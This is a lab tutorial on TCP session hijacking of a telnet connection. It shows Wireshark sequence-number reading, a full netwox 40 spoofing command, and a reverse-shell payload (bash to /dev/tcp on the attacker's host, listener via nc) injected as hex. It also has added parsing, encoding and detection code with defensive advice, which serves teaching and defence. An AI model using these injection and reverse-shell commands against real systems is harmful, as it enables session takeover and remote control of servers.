TCP Session Hijacking Attack
Attack idea
1. The attacker obtains the TCP session packets exchanged between the client and the server (via ARP poisoning, MAC flooding, etc.);
2. Observe the TCP segments the server sends to the client, to learn what the client's next segment to the server must contain;
3. The attacker uses a tool to forge a TCP segment and sends it to the server; its contents are taken from the segment captured in step 2.
Roughly, the forged segment needs the following:
(1) Layer 2: the source MAC is the attacker's machine
(2) Layer 3: the source IP is the client's IP, the destination IP is the server's IP
(3) Layer 4: the parameters have to be obtained from step 2
Note: the server identifies the session only by the Layer 3 and Layer 4 information (IP addresses, ports, sequence and acknowledgement numbers); the Layer 2 source MAC plays no part in that decision.
Next we build a lab to carry out the TCP hijacking attack:
Lab topology
Device description
Here A and B are simulated with Red Hat Linux, and C with a Kali virtual machine.
Attack steps
Step 1: the victim A telnets to server B
First the victim A telnets to server B; once logged in, it runs the "ls" command to list the files in B's current directory.
Step 2: capture the Telnet traffic
Then, on attacker C, use Wireshark to capture the Telnet traffic.
Look first at the bottom-most packet in the capture; it is the last packet that server B sent to the victim host A:
From this packet we can read: the source and destination IP addresses, the source and destination port numbers, the next expected sequence number 2730357243, the acknowledgement number 733859712, and the flags (PSH, ACK).
One point to note here:
If the sequence number and ACK number appear as very small values, do the following:
Remove the check mark at ② in the figure (Wireshark shows relative sequence numbers by default; the absolute values are the ones needed here).
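As an added example that is not part of the original write-up, the following Python parses a raw IPv4+TCP segment into the fields read off the capture above, computes the "next sequence number" the way Wireshark does (seq plus payload length, plus one for SYN or FIN), and converts an absolute sequence number into the relative form Wireshark displays by default. The sample segment is constructed here, reusing the write-up's addresses, ports and sequence numbers; the ISN used for the relative display is a made-up value.

```python
import socket
import struct

# TCP flag bits, low to high
FLAG_NAMES = [(0x01, "FIN"), (0x02, "SYN"), (0x04, "RST"),
              (0x08, "PSH"), (0x10, "ACK"), (0x20, "URG")]
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20


def build_segment(src_ip, dst_ip, sport, dport, seq, ack, flags, payload, ttl=64, window=235):
    """Build a minimal IPv4+TCP segment (no options, checksums left at 0).
    Used here only to construct sample input for parse_segment()."""
    total_len = 20 + 20 + len(payload)
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0x1234, 0x4000,
                         ttl, 6, 0, socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    tcp_hdr = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, window, 0, 0)
    return ip_hdr + tcp_hdr + payload


def parse_segment(raw):
    """Decode the IPv4/TCP fields an analyst reads in Wireshark's packet details."""
    (ver_ihl, _tos, _tot, _id, _frag, ttl, proto, _csum,
     src, dst) = struct.unpack("!BBHHHBBH4s4s", raw[:20])
    if ver_ihl >> 4 != 4 or proto != 6:
        raise ValueError("not an IPv4/TCP segment")
    ihl = (ver_ihl & 0x0F) * 4
    (sport, dport, seq, ack, doff_res, flags,
     window, _csum2, _urg) = struct.unpack("!HHIIBBHHH", raw[ihl:ihl + 20])
    doff = (doff_res >> 4) * 4
    payload = raw[ihl + doff:]
    # Wireshark's "Next sequence number": seq + payload length,
    # plus one if a SYN or FIN consumes a sequence number; modulo 2^32
    next_seq = (seq + len(payload) + (1 if flags & (SYN | FIN) else 0)) & 0xFFFFFFFF
    return {
        "src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst), "ttl": ttl,
        "sport": sport, "dport": dport, "seq": seq, "ack": ack,
        "flags": [name for bit, name in FLAG_NAMES if flags & bit],
        "window": window, "payload": payload, "next_seq": next_seq,
    }


def relative_seq(absolute_seq, isn):
    """Wireshark's default relative display: the sequence number minus the ISN
    of that direction (the seq of the SYN), so the SYN shows as 0 and the first
    data byte as 1. The mask handles 32-bit wrap-around."""
    return (absolute_seq - isn) & 0xFFFFFFFF


if __name__ == "__main__":
    # Constructed sample: a segment from server B to client A carrying the
    # write-up's numbers (seq chosen so that next_seq is 2730357243)
    raw = build_segment("192.168.248.128", "192.168.248.127", 23, 54325,
                        2730357239, 733859712, PSH | ACK, b"ls\r\n")
    p = parse_segment(raw)
    print(p["src"], p["sport"], "->", p["dst"], p["dport"], p["flags"])
    print("seq", p["seq"], "next_seq", p["next_seq"], "ack", p["ack"])
    print("relative seq for a constructed ISN of 2730357000:",
          relative_seq(p["seq"], 2730357000))
```

The relative/absolute distinction is exactly the pitfall the note above warns about: a relative value such as 239 is only meaningful to Wireshark, while the TCP stack on the server compares against the absolute 32-bit numbers.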
Step 3: go into the Kali VM and forge the TCP segment
Type netwox and use the netwox tool to forge the segment:
Below is the menu path to netwox's TCP spoofing tool; its tool number is 40:
kali@kali:~/Desktop$ netwox
Netwox toolbox version 5.39.0. Netwib library version 5.39.0.
######################## MAIN MENU #########################
0 - leave netwox
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a + information
b + network protocol
c + application protocol
d + sniff (capture network packets)
e + spoof (create and send packets)
f + record (file containing captured packets)
g + client
h + server
i + ping (check if a computer if reachable)
j + traceroute (obtain list of gateways)
k + scan (computer and port discovery)
l + network audit
m + brute force (check if passwords are weak)
n + remote administration
o + tools not related to network
Select a node (key in 03456abcdefghijklmno): b
##################### network protocol #####################
0 - leave netwox
1 - go to main menu
2 - go to previous menu
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a + Ethernet
b + IP
c + UDP
d + TCP
e + ICMP
f + ARP
Select a node (key in 0123456abcdef): d
########################### TCP ############################
0 - leave netwox
1 - go to main menu
2 - go to previous menu
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a + TCP spoof
b + TCP client
c + TCP server
d + network audit using TCP
e + dns
f + ftp
g + http
h + ident
i + irc
j + nntp
k + smb
l + smtp
m + telnet
n + whois
Select a node (key in 0123456abcdefghijklmn): a
######################## TCP spoof #########################
0 - leave netwox
1 - go to main menu
2 - go to previous menu
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a - 36:Spoof EthernetIp4Tcp packet
b - 40:Spoof Ip4Tcp packet
c - 42:Spoof of packet samples : fragment
d - 43:Spoof of packet samples : fragment, ip4opt:noop
e - 44:Spoof of packet samples : fragment, ip4opt:rr
f - 45:Spoof of packet samples : fragment, ip4opt:lsrr
g - 46:Spoof of packet samples : fragment, ip4opt:ts
h - 47:Spoof of packet samples : fragment, ip4opt:ipts
i - 48:Spoof of packet samples : fragment, ip4opt:ippts
j - 142:Spoof EthernetIp6Tcp packet
k - 146:Spoof Ip6Tcp packet
l - 192:Spoof of packet samples : fragment, ip4opt:ssrr
Select a node (key in 0123456abcdefghijkl): b
################# help for tool number 40 ##################
Title: Spoof Ip4Tcp packet
+------------------------------------------------------------------------+
| This tool sends a fake packet on the network. |
| Each parameter name should be self explaining. |
| Parameter --spoofip indicates how to generate link layer for spoofing. |
| Values 'best', 'link' or 'raw' are common choices for --spoofip. Here |
| is the list of accepted values: |
| - 'raw' means to spoof at IP4/IP6 level (it uses system IP stack). If |
| a firewall is installed, or on some systems, this might not work. |
| - 'linkf' means to spoof at link level (currently, only Ethernet is |
| supported). The 'f' means to Fill source Ethernet address. |
| However, if source IP address is spoofed, it might be impossible |
| to Fill it. So, linkf will not work: use linkb or linkfb instead. |
| - 'linkb' means to spoof at link level. The 'b' means to left a Blank |
| source Ethernet address (0:0:0:0:0:0, do not try to Fill it). |
| - 'linkfb' means to spoof at link level. The 'f' means to try to Fill |
| source Ethernet address, but if it is not possible, it is left |
| Blank. |
| - 'rawlinkf' means to try 'raw', then try 'linkf' |
| - 'rawlinkb' means to try 'raw', then try 'linkb' |
| - 'rawlinkfb' means to try 'raw', then try 'linkfb' |
| - 'linkfraw' means to try 'linkf', then try 'raw' |
| - 'linkbraw' means to try 'linkb', then try 'raw' |
| - 'linkfbraw' means to try 'linkfb', then try 'raw' |
| - 'link' is an alias for 'linkfb' |
| - 'rawlink' is an alias for 'rawlinkfb' |
| - 'linkraw' is an alias for 'linkfbraw' |
| - 'best' is an alias for 'linkraw'. It should work in all cases. |
| |
| This tool may need to be run with admin privilege in order to spoof. |
+------------------------------------------------------------------------+
Synonyms: hping, send
Usage: netwox 40 [-c uint32] [-e uint32] [-f|+f] [-g|+g] [-h|+h] [-i uint32] [-j uint32] [-k uint32] [-l ip] [-m ip] [-n ip4opts] [-o port] [-p port] [-q uint32] [-r uint32] [-s|+s] [-t|+t] [-u|+u] [-v|+v] [-w|+w] [-x|+x] [-y|+y] [-z|+z] [-A|+A] [-B|+B] [-C|+C] [-D|+D] [-E uint32] [-F uint32] [-G tcpopts] [-H mixed_data] [-a spoofip] [-J uint32] [-K uint32] [-L uint32] [-M uint32] [-N uint32]
Parameters:
-c|--ip4-tos uint32 IP4 tos {0}
-e|--ip4-id uint32 IP4 id (rand if unset) {0}
-f|--ip4-reserved|+f|--no-ip4-reserved IP4 reserved
-g|--ip4-dontfrag|+g|--no-ip4-dontfrag IP4 dontfrag
-h|--ip4-morefrag|+h|--no-ip4-morefrag IP4 morefrag
-i|--ip4-offsetfrag uint32 IP4 offsetfrag {0}
-j|--ip4-ttl uint32 IP4 ttl {0}
-k|--ip4-protocol uint32 IP4 protocol {0}
-l|--ip4-src ip IP4 src {192.168.248.129}
-m|--ip4-dst ip IP4 dst {5.6.7.8}
-n|--ip4-opt ip4opts IPv4 options
-o|--tcp-src port TCP src {1234}
-p|--tcp-dst port TCP dst {80}
-q|--tcp-seqnum uint32 TCP seqnum (rand if unset) {0}
-r|--tcp-acknum uint32 TCP acknum {0}
-s|--tcp-reserved1|+s|--no-tcp-reserved1 TCP reserved1
-t|--tcp-reserved2|+t|--no-tcp-reserved2 TCP reserved2
-u|--tcp-reserved3|+u|--no-tcp-reserved3 TCP reserved3
-v|--tcp-reserved4|+v|--no-tcp-reserved4 TCP reserved4
-w|--tcp-cwr|+w|--no-tcp-cwr TCP cwr
-x|--tcp-ece|+x|--no-tcp-ece TCP ece
-y|--tcp-urg|+y|--no-tcp-urg TCP urg
-z|--tcp-ack|+z|--no-tcp-ack TCP ack
-A|--tcp-psh|+A|--no-tcp-psh TCP psh
-B|--tcp-rst|+B|--no-tcp-rst TCP rst
-C|--tcp-syn|+C|--no-tcp-syn TCP syn
-D|--tcp-fin|+D|--no-tcp-fin TCP fin
-E|--tcp-window uint32 TCP window {0}
-F|--tcp-urgptr uint32 TCP urgptr {0}
-G|--tcp-opt tcpopts TCP options
-H|--tcp-data mixed_data mixed data
-a|--spoofip spoofip IP spoof initialization type {best}
-J|--ip4-ihl uint32 IP4 ihl {5}
-K|--ip4-totlen uint32 IP4 totlen {0}
-L|--ip4-checksum uint32 IP4 checksum {0}
-M|--tcp-doff uint32 TCP data offset {0}
-N|--tcp-checksum uint32 TCP checksum {0}
Example: netwox 40
Press 'r' or 'k' to run this tool, or any other key to continue
Command
sudo netwox 40 --ip4-ttl 64 --ip4-protocol 6 --ip4-src 192.168.248.127 --ip4-dst 192.168.248.128 --tcp-src 54325 --tcp-dst 23 --tcp-seqnum 733859712 --tcp-acknum 2730357243 --tcp-ack --tcp-psh --tcp-window 235 --tcp-data 6c730d0a
The --tcp-data parameter of this command is determined by the following three packets:
(1) The first packet the server sends back to the client:
(2) The second packet the server sends back to the client:
(3) The third packet the server sends back to the client:
The data carried by these three packets, converted to hexadecimal, is 6c730d0a (the ASCII bytes of "ls" followed by CR LF).
After entering the command:
This forges a TCP segment and sends it to the server.
Now looking at the victim host A again, we find that the telnet session is stuck.
At this point the attack has succeeded: attacker C has hijacked the TCP session, and A and B can no longer communicate.
The above is the basic TCP hijacking attack. Next we first explain the principle of a reverse shell, and then the attack that uses TCP hijacking to deliver a reverse shell.
Reverse shell injection
Principle
Commands
attacker: nc -lp 8888 -vvv
data server: bash -i>&/dev/tcp/192.168.249.131/8888 0>&1
Explanation:
nc is a small utility; this command listens on port 8888 and displays whatever arrives in real time;
Effect:
Listen on port 8888 on the attacker machine first, then enter the shell line above on the data server; the attacker machine then automatically obtains a login on the data server.
The screen after a successful hijack looks the same as the reverse shell obtained via TCP hijacking.
Using TCP hijacking to deliver a reverse shell
Attack code
bash -i>&/dev/tcp/192.168.248.129/8888 0>&1
The text converted to hexadecimal:
62617368202d693e262f6465762f7463702f3139322e3136382e3234382e3132392f3838383820303e26310d00
// The attack code converted to hex; the 0d00 is appended afterwards: 0d is \r, the carriage return to the start of the line, and 00 is \n, the line feed
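As an added example that is not part of the original write-up, the following Python shows how Telnet's Network Virtual Terminal (RFC 854) puts a command line on the wire, which is where both byte strings above come from. RFC 854 defines CR LF as the end-of-line sequence and requires a carriage return that is not followed by a line feed to be sent as CR NUL; so "ls" typed at the prompt travels as 6c730d0a, and a line terminated with 0d00 is a bare carriage return (the 00 is NUL, not a line feed), which a Unix telnet server passes to the pseudo-terminal as a carriage return and the line discipline normally treats as end of line. The function names are mine; the sample strings are constructed.

```python
IAC = 0xFF  # Telnet "Interpret As Command" byte (RFC 854)


def nvt_encode(line: str, bare_cr: bool = False) -> bytes:
    """Encode one command line as Telnet NVT bytes.

    RFC 854: the end-of-line sequence is CR LF; a carriage return that is not
    followed by a line feed must be transmitted as CR NUL. bare_cr=True selects
    the CR NUL form. A literal 0xFF byte in the data is escaped as IAC IAC.
    """
    data = line.encode("latin-1").replace(bytes([IAC]), bytes([IAC, IAC]))
    return data + (b"\r\x00" if bare_cr else b"\r\n")


def nvt_decode(wire: bytes) -> str:
    """Turn NVT bytes back into text: CR LF and CR NUL both become a line feed,
    IAC IAC becomes a single 0xFF byte. Option negotiation (IAC followed by
    anything other than IAC) is out of scope for this example."""
    out = bytearray()
    i = 0
    while i < len(wire):
        b = wire[i]
        nxt = wire[i + 1] if i + 1 < len(wire) else None
        if b == 0x0D and nxt in (0x0A, 0x00):
            out.append(0x0A)
            i += 2
        elif b == IAC and nxt == IAC:
            out.append(IAC)
            i += 2
        else:
            out.append(b)
            i += 1
    return out.decode("latin-1")


def to_hex(line: str, bare_cr: bool = False) -> str:
    """Hex string of the encoded line, the form used for netwox --tcp-data."""
    return nvt_encode(line, bare_cr).hex()


if __name__ == "__main__":
    print(to_hex("ls"))                 # CR LF form, as seen in the capture
    print(to_hex("ls", bare_cr=True))   # CR NUL form
    print(repr(nvt_decode(bytes.fromhex("6c730d00"))))
```

For a defender inspecting telnet payloads, nvt_decode is the normalisation step to run before pattern matching: the same command can arrive with either line ending, and a rule that only looks for 0d0a misses the 0d00 variant.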
Attack steps and commands
Same as the TCP hijacking attack above:
- First capture a TCP segment, then forge a TCP segment that carries the reverse-shell script and send it to the target, so that the attacker obtains a login on the target and can control it.
- Open two terminal windows on the attacker machine: one to listen on port 8888, the other to forge the TCP segment.
Attacker terminal window 1 command:
sudo netwox 40 --ip4-ttl 64 --ip4-protocol 6 --ip4-src 192.168.248.127 --ip4-dst 192.168.248.128 --tcp-src 54327 --tcp-dst 23 --tcp-seqnum 164306404 --tcp-acknum 3490891661 --tcp-ack --tcp-psh --tcp-window 235 --tcp-data 62617368202d693e262f6465762f7463702f3139322e3136382e3234382e3132392f3838383820303e26310d00
Attacker terminal window 2 command:
nc -lp 8888 -vvv
Effect:
The forged TCP segment (terminal window 1):
Terminal window 2:
As the screenshot above shows, having gained access to the target machine, we can run ls to list its files.
Extension
A TCP hijacking attack ultimately leaves the victim's established TCP connection broken for as long as the attack lasts (the victim cannot operate; the session is stuck), but as soon as the attacker stops the attack, the connection comes back automatically (and the victim can operate again).
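The stuck session described after the first attack and the hang-then-recover behaviour noted here are two faces of the same mechanism: after the forged segment, the server's acknowledgement number runs ahead of what the client has really sent, so the client's own keystrokes fall outside the server's window and the two endpoints trade payload-less ACKs that neither can accept (the "ACK storm"). Both leave traces a monitoring point can see: a segment in an established flow whose Ethernet source or TTL differs from every earlier segment in that direction, and a burst of empty ACKs with no data between them. As an added example that is not part of the original write-up, the following Python detector runs over a constructed capture of this lab and raises both alerts. The MAC addresses, timestamps and thresholds are assumptions.

```python
from collections import defaultdict

# Constructed sample traffic (not a real capture) mirroring the lab:
# A = client, B = telnet server, C = attacker host. MACs are made up.
MAC_A, MAC_B, MAC_C = "aa:aa:aa:aa:aa:01", "bb:bb:bb:bb:bb:02", "cc:cc:cc:cc:cc:03"
A, B = "192.168.248.127", "192.168.248.128"


def frame(ts, src_mac, src, sport, dst, dport, flags, plen, ttl=64):
    """One captured frame reduced to the fields the detector needs."""
    return {"ts": ts, "src_mac": src_mac, "src": src, "sport": sport, "dst": dst,
            "dport": dport, "flags": frozenset(flags), "plen": plen, "ttl": ttl}


def sample_capture():
    pkts = [
        frame(0.00, MAC_A, A, 54325, B, 23, {"PSH", "ACK"}, 1),  # A types 'l'
        frame(0.01, MAC_B, B, 23, A, 54325, {"PSH", "ACK"}, 1),  # B echoes it
        frame(0.02, MAC_A, A, 54325, B, 23, {"ACK"}, 0),         # A acknowledges
        frame(0.50, MAC_A, A, 54325, B, 23, {"PSH", "ACK"}, 1),  # A types 's'
        frame(0.51, MAC_B, B, 23, A, 54325, {"PSH", "ACK"}, 1),
        frame(0.52, MAC_A, A, 54325, B, 23, {"ACK"}, 0),
        # forged segment: A's IP and port, but emitted from C's interface
        frame(2.00, MAC_C, A, 54325, B, 23, {"PSH", "ACK"}, 4),
    ]
    # B's ACK number has now moved past what A really sent; the endpoints
    # exchange payload-less ACKs that neither side can accept
    for i in range(10):
        from_b = i % 2 == 0
        pkts.append(frame(round(2.1 + 0.001 * i, 3),
                          MAC_B if from_b else MAC_A,
                          B if from_b else A, 23 if from_b else 54325,
                          A if from_b else B, 54325 if from_b else 23,
                          {"ACK"}, 0))
    return pkts


def detect(packets, storm_window=1.0, storm_threshold=6):
    """Return alerts for (1) a segment whose source MAC or TTL differs from the
    baseline learned for that direction of the flow, and (2) a burst of
    payload-less ACKs on a connection with no data segment in between."""
    alerts = []
    baseline = {}                   # (src, sport, dst, dport) -> (src_mac, ttl)
    pure_acks = defaultdict(list)   # connection -> timestamps of recent pure ACKs
    for p in packets:
        direction = (p["src"], p["sport"], p["dst"], p["dport"])
        origin = (p["src_mac"], p["ttl"])
        if direction not in baseline:
            baseline[direction] = origin       # first frame seen sets the baseline
        elif origin != baseline[direction]:
            alerts.append(("SPOOFED_SEGMENT", p["ts"], direction, p["src_mac"]))

        conn = tuple(sorted([(p["src"], p["sport"]), (p["dst"], p["dport"])]))
        if p["flags"] == {"ACK"} and p["plen"] == 0:
            recent = pure_acks[conn]
            recent.append(p["ts"])
            while recent and recent[0] < p["ts"] - storm_window:
                recent.pop(0)                  # slide the time window
            if len(recent) == storm_threshold:
                alerts.append(("ACK_STORM", p["ts"], conn, storm_threshold))
        else:
            pure_acks[conn].clear()            # data or control segment breaks the pattern
    return alerts


if __name__ == "__main__":
    for alert in detect(sample_capture()):
        print(alert)
```

Two caveats on using this for real: the MAC/TTL baseline is only as good as the first frame seen per direction, so it must be learned from traffic captured before the attack and at a point (a mirror port, not the poisoned hosts) where the original Ethernet source is visible; and the ACK-storm threshold needs tuning against the normal keepalive and delayed-ACK behaviour of the monitored network. The structural fix is not detection at all but removing the precondition: an authenticated, integrity-protected transport such as SSH instead of cleartext telnet rejects injected bytes regardless of how well the sequence numbers were guessed.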